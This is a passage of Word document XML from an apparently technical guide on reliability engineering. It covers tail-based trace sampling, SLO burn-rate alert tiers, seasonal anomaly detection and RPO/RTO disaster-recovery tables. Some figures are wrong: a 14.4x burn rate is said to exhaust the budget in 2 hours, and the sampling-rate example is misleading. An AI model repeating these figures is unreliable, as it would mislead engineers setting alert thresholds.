      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Trace sampling strategies for reliability:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EDAD5AC" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Head-based sampling:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> Decide at the start of the request whether to trace it (e.g., sample 1% of traffic). Simple but misses rare failures — if failures occur in 0.1% of requests, sampling 1% captures them only 0.001% of the time.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C43F51D" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Tail-based sampling:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> Buffer all spans for a trace. After the trace completes (or after a timeout), apply sampling rules: always sample traces containing errors, always sample traces with latency above p99.9, sample 1% of successful/fast traces. This ensures </w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>all anomalous traces are captured</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> while only a small fraction of normal traces are kept. Jaeger and Tempo support tail-based sampling.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="761F13E7" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Exemplar-based sampling:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> Store trace IDs alongside metric data points. When a metric shows a spike, query the exemplar to find a representative trace from that spike period — instantly correlating metric anomaly to request-level root cause.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="214B71DE" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>SLO-Based Alerting — Alert on Reliability, Not Symptoms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="665C0951" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>Traditional alerting fires when a metric crosses a threshold: "CPU &gt; 80%." This creates alert fatigue (CPU at 81% may be completely fine) and misses reliability issues (CPU at 50% while requests are failing).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73DE670D" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Error budget burn rate alerting</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> ties alerts directly to </w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>user-facing reliability</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36245CE0" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>Define your SLO: 99.9% of requests must succeed (error budget: 0.1% = 43.8 minutes per month).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C0BE0A8" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>Compute the sustainable burn rate: consuming the entire error budget uniformly over 30 days = 1x burn rate.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EB65A5B" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Alert tiers based on burn rate:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14B54049" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="086FE13A" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>Burn rate &gt; 14.4x for 1 hour:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47202418" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t xml:space="preserve">  → At this rate, error budget exhausted in 2 hours</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37158523" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t xml:space="preserve">  → PAGE IMMEDIATELY — major incident in progress</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FA15014" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t xml:space="preserve">  → Example: 8% error rate sustained for 1 hour</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A89EA3A" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t xml:space="preserve">    (0.08 / 0.001 = 80x burn, way over threshold)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17EBA08B" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6"/>
    <w:p w14:paraId="457AB682" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>Burn rate &gt; 6x for 6 hours:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FB8740B" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t xml:space="preserve">  → At this rate, error budget exhausted in 5 days</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3248832B" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t xml:space="preserve">  → PAGE — significant reliability issue, needs investigation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22DCD2CD" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t xml:space="preserve">  → Example: 1.5% error rate sustained for 6 hours</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C8FD592" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6"/>
    <w:p w14:paraId="05010661" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>Burn rate &gt; 3x for 24 hours:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="135E5D88" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t xml:space="preserve">  → At this rate, error budget exhausted in 10 days</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2636D6EA" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t xml:space="preserve">  → TICKET — elevated error rate, needs attention before budget exhausts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20DFA4CE" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6"/>
    <w:p w14:paraId="3EC2257D" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>Burn rate &gt; 1x for 3 days:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3924FE28" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t xml:space="preserve">  → Consuming budget faster than sustainable rate</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B3724E3" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t xml:space="preserve">  → REPORT — mild reliability degradation, track trend</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D8F08EE" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The mathematical advantage:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t xml:space="preserve"> Burn rate alerting automatically adjusts sensitivity to current traffic. A 1% error rate when you serve 100 RPS (1 failed request/sec) is very </w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:lastRenderedPageBreak/>
        <w:t>different from 1% at 100,000 RPS (1,000 failed requests/sec). Burn rate (normalized to your SLO) scales correctly with traffic — high traffic exhausts the budget faster, appropriately triggering higher-priority alerts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="235684F4" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Anomaly Detection for Reliability</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49374D19" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>Fixed thresholds fail for metrics with </w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>seasonal patterns</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> — a CPU spike to 70% at 9am Monday is normal (business hours peak), the same spike at 3am Sunday is anomalous (something is wrong). Fixed threshold alerts would fire or not fire in both cases equally — missing the anomaly or creating false positives.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6995845B" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Anomaly detection approaches:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="280393D1" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Baseline + deviation:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> Compute the expected value for each metric at each time of day/day of week (rolling average of past N weeks). Alert when current value deviates more than K standard deviations from the baseline. This adapts to seasonal patterns automatically.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C4A7CF6" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Fourier decomposition:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> Decompose the metric time series into trend + seasonal + residual components. Alert on anomalies in the residual (what remains after expected patterns are removed). Handles weekly and daily seasonality simultaneously.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40A8C082" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Machine learning models (Prophet, LSTM):</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> Facebook's Prophet is a time series forecasting model designed for metrics with multiple seasonality patterns, holidays, and trend changes. Fit Prophet on historical metric data, use it to predict expected future values, alert when actual values deviate significantly from predictions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24EE1E95" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>The reliability value: </w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>detecting degradation before it crosses absolute thresholds</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t>. A gradually increasing error rate (0.01% → 0.02% → 0.05% → 0.1% over 6 hours) might never trigger a fixed threshold alert (if the threshold is 0.5%) but is clearly anomalous and will eventually breach the SLO. Anomaly detection catches this trend early.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E180E6C" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:pict w14:anchorId="6901F54F">
          <v:rect id="_x0000_i2789" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BEE2C56" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>8. Disaster Recovery — Engineering for the Worst Case</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B27B6AF" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>RPO and RTO as Engineering Requirements</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D983071" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>RPO (Recovery Point Objective):</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> Maximum data loss acceptable. Determines backup/replication frequency.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="728722DC" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>RTO (Recovery Time Objective):</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> Maximum downtime acceptable. Determines recovery automation requirements.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45513A86" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>These are not just SLA numbers — they are </w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>engineering requirements</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> that dictate architecture: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768"/>
        <w:gridCol w:w="4625"/>
        <w:gridCol w:w="2957"/>
      </w:tblGrid>
      <w:tr w:rsidR="00397DF6" w:rsidRPr="00397DF6" w14:paraId="1BDA399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3EF009" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00397DF6">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>RPO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8B5C72" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00397DF6">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Required Mechanism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66265A" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00397DF6">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Cost</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00397DF6" w:rsidRPr="00397DF6" w14:paraId="0EE7974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E03491" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
            <w:r w:rsidRPr="00397DF6">
              <w:t>0 (zero data loss)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4D68EE" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
            <w:r w:rsidRPr="00397DF6">
              <w:t>Synchronous multi-region replication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BF4C86" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
            <w:r w:rsidRPr="00397DF6">
              <w:t>Very high — write latency, complex</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00397DF6" w:rsidRPr="00397DF6" w14:paraId="6606ED0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A28C00" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
            <w:r w:rsidRPr="00397DF6">
              <w:t>&lt; 1 second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E1D1B7" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
            <w:r w:rsidRPr="00397DF6">
              <w:t>Asynchronous replication + high-frequency WAL shipping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371AAC" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
            <w:r w:rsidRPr="00397DF6">
              <w:t>High</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00397DF6" w:rsidRPr="00397DF6" w14:paraId="1B76B3D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BF4C3B" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
            <w:r w:rsidRPr="00397DF6">
              <w:t>&lt; 1 minute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DC397D" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
            <w:r w:rsidRPr="00397DF6">
              <w:t>Asynchronous replication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966A3E" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
            <w:r w:rsidRPr="00397DF6">
              <w:t>Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00397DF6" w:rsidRPr="00397DF6" w14:paraId="27A54A5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DE7841" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
            <w:r w:rsidRPr="00397DF6">
              <w:t>&lt; 1 hour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B82915" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
            <w:r w:rsidRPr="00397DF6">
              <w:t>Frequent snapshots to object storage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0CF1CE" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
            <w:r w:rsidRPr="00397DF6">
              <w:t>Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00397DF6" w:rsidRPr="00397DF6" w14:paraId="5C5EF4D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210781" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
            <w:r w:rsidRPr="00397DF6">
              <w:t>&lt; 24 hours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299FEE" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
            <w:r w:rsidRPr="00397DF6">
              <w:t>Daily backups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E92C8E" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
            <w:r w:rsidRPr="00397DF6">
              <w:t>Minimal</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="41E2B65D" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:pPr>
        <w:rPr>
          <w:vanish/>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719"/>
        <w:gridCol w:w="5558"/>
        <w:gridCol w:w="1327"/>
      </w:tblGrid>
      <w:tr w:rsidR="00397DF6" w:rsidRPr="00397DF6" w14:paraId="1F9A97A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7AEFB8" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00397DF6">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>RTO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4B28D4" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00397DF6">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Required Mechanism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6A35B0" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00397DF6">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Cost</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00397DF6" w:rsidRPr="00397DF6" w14:paraId="711C813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B7A42E" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
            <w:r w:rsidRPr="00397DF6">
              <w:t>&lt; 1 minute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221E07" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
            <w:r w:rsidRPr="00397DF6">
              <w:t>Active-active multi-region + Anycast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E6B78E" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
            <w:r w:rsidRPr="00397DF6">
              <w:t>Very high</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00397DF6" w:rsidRPr="00397DF6" w14:paraId="7FF7C58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966236" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
            <w:r w:rsidRPr="00397DF6">
              <w:t>&lt; 5 minutes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42B138" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
            <w:r w:rsidRPr="00397DF6">
              <w:t>Active-passive + automated failover + VIP takeover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959812" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
            <w:r w:rsidRPr="00397DF6">
              <w:t>High</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00397DF6" w:rsidRPr="00397DF6" w14:paraId="6FF1B15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60ACF8" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
            <w:r w:rsidRPr="00397DF6">
              <w:t>&lt; 30 minutes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D88E79" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
            <w:r w:rsidRPr="00397DF6">
              <w:t>Active-passive + automated failover scripts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DE6C69" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
            <w:r w:rsidRPr="00397DF6">
              <w:t>Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00397DF6" w:rsidRPr="00397DF6" w14:paraId="3A2A07B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2C3A9C" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
            <w:r w:rsidRPr="00397DF6">
              <w:t>&lt; 4 hours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D12AF2" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
            <w:r w:rsidRPr="00397DF6">
              <w:t>Active-passive + manual failover runbook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694933" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
            <w:r w:rsidRPr="00397DF6">
              <w:t>Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00397DF6" w:rsidRPr="00397DF6" w14:paraId="6F2F8BB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76B751" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
            <w:r w:rsidRPr="00397DF6">
              <w:t>&lt; 24 hours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639556" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
            <w:r w:rsidRPr="00397DF6">
              <w:t>Cold standby + manual restore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64E846" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
            <w:r w:rsidRPr="00397DF6">
              <w:t>Minimal</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
